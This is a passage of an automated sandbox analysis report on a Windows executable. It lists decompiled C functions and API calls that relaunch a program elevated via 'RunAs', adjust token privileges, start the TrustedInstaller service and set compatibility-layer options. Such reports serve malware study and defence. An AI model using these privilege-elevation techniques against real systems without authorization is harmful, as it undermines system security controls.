                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                                                                  • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                                                                  • Process32NextW.KERNEL32 ref: 0040978C
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                  • API String ID: 239888749-1740548384
                                                                                                                                                                  • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                  • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                                                                  • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                  			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}













                                                                                                                                                                  0x00401c31
                                                                                                                                                                  0x00401c33
                                                                                                                                                                  0x00401c48
                                                                                                                                                                  0x00401c4f
                                                                                                                                                                  0x00401c61
                                                                                                                                                                  0x00401c68
                                                                                                                                                                  0x00401c74
                                                                                                                                                                  0x00401c79
                                                                                                                                                                  0x00401c7a
                                                                                                                                                                  0x00401c7b
                                                                                                                                                                  0x00401c84
                                                                                                                                                                  0x00401c89
                                                                                                                                                                  0x00401c8e
                                                                                                                                                                  0x00401c8f
                                                                                                                                                                  0x00401c9b
                                                                                                                                                                  0x00401ca6
                                                                                                                                                                  0x00401caf
                                                                                                                                                                  0x00401cb9
                                                                                                                                                                  0x00401cc0
                                                                                                                                                                  0x00401cc7
                                                                                                                                                                  0x00401cce
                                                                                                                                                                  0x00401cd5
                                                                                                                                                                  0x00401cdd
                                                                                                                                                                  0x00401ce0
                                                                                                                                                                  0x00401d14
                                                                                                                                                                  0x00401ce2
                                                                                                                                                                  0x00401ce8
                                                                                                                                                                  0x00401cf3
                                                                                                                                                                  0x00401cf6
                                                                                                                                                                  0x00401cfe
                                                                                                                                                                  0x00401d09
                                                                                                                                                                  0x00401d09
                                                                                                                                                                  0x00401cfe
                                                                                                                                                                  0x00401d1b

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                                                                  • memset.MSVCRT ref: 00401C4F
                                                                                                                                                                  • memset.MSVCRT ref: 00401C68
                                                                                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                                                                  • memset.MSVCRT ref: 00401C9B
                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                                                                  • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                                                                  • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                                                                  • API String ID: 903100921-3385179869
                                                                                                                                                                  • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                  • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                                                                  • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                  • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                                                                  0x00408fc9
                                                                                                                                                                  0x00408fd0
                                                                                                                                                                  0x00408fe8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408fea
                                                                                                                                                                  0x00408ff4
                                                                                                                                                                  0x00409001
                                                                                                                                                                  0x00409003
                                                                                                                                                                  0x0040900c
                                                                                                                                                                  0x0040900e
                                                                                                                                                                  0x00409010
                                                                                                                                                                  0x0040901a
                                                                                                                                                                  0x0040901a
                                                                                                                                                                  0x00409010
                                                                                                                                                                  0x0040901f
                                                                                                                                                                  0x00409026
                                                                                                                                                                  0x0040902d
                                                                                                                                                                  0x00409030
                                                                                                                                                                  0x00409035
                                                                                                                                                                  0x00409037
                                                                                                                                                                  0x00409040
                                                                                                                                                                  0x00409042
                                                                                                                                                                  0x00409044
                                                                                                                                                                  0x00409051
                                                                                                                                                                  0x00409051
                                                                                                                                                                  0x00409044
                                                                                                                                                                  0x00409053
                                                                                                                                                                  0x0040905e
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken,00000000,00000000,00408FE6,00000000), ref: 00408FA8
                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW,00000000,00000000,00000000), ref: 0040900C
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges,00000000,00000000,00000000), ref: 00409040
                                                                                                                                                                  • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00409053
                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 0040905E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                                                                  • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                                                                  • API String ID: 616250965-1253513912
                                                                                                                                                                  • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                  • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                                                                  • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                  • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                                                                  0x00401319
                                                                                                                                                                  0x0040131b
                                                                                                                                                                  0x00401327
                                                                                                                                                                  0x0040132b
                                                                                                                                                                  0x0040133a
                                                                                                                                                                  0x0040134b
                                                                                                                                                                  0x0040134b
                                                                                                                                                                  0x0040134e
                                                                                                                                                                  0x0040134e
                                                                                                                                                                  0x00401353
                                                                                                                                                                  0x0040135b

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                                                                  • String ID: TrustedInstaller
                                                                                                                                                                  • API String ID: 862991418-565535830
                                                                                                                                                                  • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                  • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                                                                  • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                  • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                                                                  0x0040a348
                                                                                                                                                                  0x0040a34e
                                                                                                                                                                  0x0040a352
                                                                                                                                                                  0x0040a35f
                                                                                                                                                                  0x0040a363
                                                                                                                                                                  0x0040a369
                                                                                                                                                                  0x0040a371
                                                                                                                                                                  0x0040a374
                                                                                                                                                                  0x0040a37c
                                                                                                                                                                  0x0040a380
                                                                                                                                                                  0x0040a383
                                                                                                                                                                  0x0040a386
                                                                                                                                                                  0x0040a388
                                                                                                                                                                  0x0040a388
                                                                                                                                                                  0x0040a38c
                                                                                                                                                                  0x0040a38f
                                                                                                                                                                  0x0040a39f
                                                                                                                                                                  0x0040a3a1
                                                                                                                                                                  0x0040a3a5
                                                                                                                                                                  0x0040a3a5
                                                                                                                                                                  0x0040a3a9
                                                                                                                                                                  0x0040a3aa
                                                                                                                                                                  0x0040a3b3
                                                                                                                                                                  0x0040a3b3
                                                                                                                                                                  0x0040a37c
                                                                                                                                                                  0x0040a371
                                                                                                                                                                  0x0040a3b8
                                                                                                                                                                  0x0040a3be

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,?), ref: 0040A348
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                  • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                  • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                                                                  • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                  • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                  			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                                                                  0x004022d5
                                                                                                                                                                  0x004022dd
                                                                                                                                                                  0x004022e7
                                                                                                                                                                  0x004022ec
                                                                                                                                                                  0x004022f7
                                                                                                                                                                  0x004022fa
                                                                                                                                                                  0x004022fd
                                                                                                                                                                  0x00402300
                                                                                                                                                                  0x00402307
                                                                                                                                                                  0x0040230d
                                                                                                                                                                  0x0040230e
                                                                                                                                                                  0x00402318
                                                                                                                                                                  0x00402321
                                                                                                                                                                  0x00402324
                                                                                                                                                                  0x00402327
                                                                                                                                                                  0x0040232a
                                                                                                                                                                  0x0040232d
                                                                                                                                                                  0x00402334
                                                                                                                                                                  0x00402337
                                                                                                                                                                  0x0040233e
                                                                                                                                                                  0x0040234f
                                                                                                                                                                  0x00402356
                                                                                                                                                                  0x0040235b
                                                                                                                                                                  0x0040235e
                                                                                                                                                                  0x0040236d
                                                                                                                                                                  0x00402374
                                                                                                                                                                  0x0040237e
                                                                                                                                                                  0x00402395
                                                                                                                                                                  0x004023a0
                                                                                                                                                                  0x004023a0
                                                                                                                                                                  0x004023ac
                                                                                                                                                                  0x004023cf
                                                                                                                                                                  0x004023d2
                                                                                                                                                                  0x004023d9
                                                                                                                                                                  0x004023de
                                                                                                                                                                  0x004023f6
                                                                                                                                                                  0x00402403
                                                                                                                                                                  0x00402414
                                                                                                                                                                  0x00402419
                                                                                                                                                                  0x00402403
                                                                                                                                                                  0x0040241a
                                                                                                                                                                  0x00402423
                                                                                                                                                                  0x00402458
                                                                                                                                                                  0x0040245d
                                                                                                                                                                  0x00402464
                                                                                                                                                                  0x00402467
                                                                                                                                                                  0x00402468
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402425
                                                                                                                                                                  0x00402428
                                                                                                                                                                  0x0040242b
                                                                                                                                                                  0x00402433
                                                                                                                                                                  0x00402434
